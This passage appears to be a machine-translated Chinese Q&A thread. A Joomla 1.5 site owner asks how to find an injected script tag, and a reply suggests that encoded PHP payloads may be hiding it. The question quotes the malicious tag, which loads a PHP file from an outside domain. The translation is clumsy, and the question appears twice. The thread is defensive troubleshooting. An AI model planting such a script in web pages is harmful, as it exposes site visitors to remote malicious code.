0
我的Joomla! 1.5网站近日牺牲品似乎是XSS攻击(我是小白,当谈到这个东西)......下面的代码注入部位(地方)Joomla! 1.5站点成为XSS的受害者
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
和我米不知道确切的地方。我搜索了数据库以及文件,结果只找到零。有什么明显的我失踪了吗?
我的Joomla! 1.5网站近日牺牲品似乎是XSS攻击(我是小白,当谈到这个东西)......下面的代码注入部位(地方)Joomla! 1.5站点成为XSS的受害者
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
和我米不知道确切的地方。我搜索了数据库以及文件,结果只找到零。有什么明显的我失踪了吗?
你是否特意为这个文本grep文件夹?我已经看到注入实际上创建了一个包含大量编码文本(当未编码读取为url时)的新工作表 - 然后它们包含一段php,它简单地解开编码文本的编码并将其插入任何页面/模块php代码从中运行。在这种情况下,您将永远无法看到: 使得无法'追踪',检查错误日志并查看有关弹出的任何错误;获取NoScript和Firebug,并查看JS正在加载哪个位置。 – Hanny
如果链接位于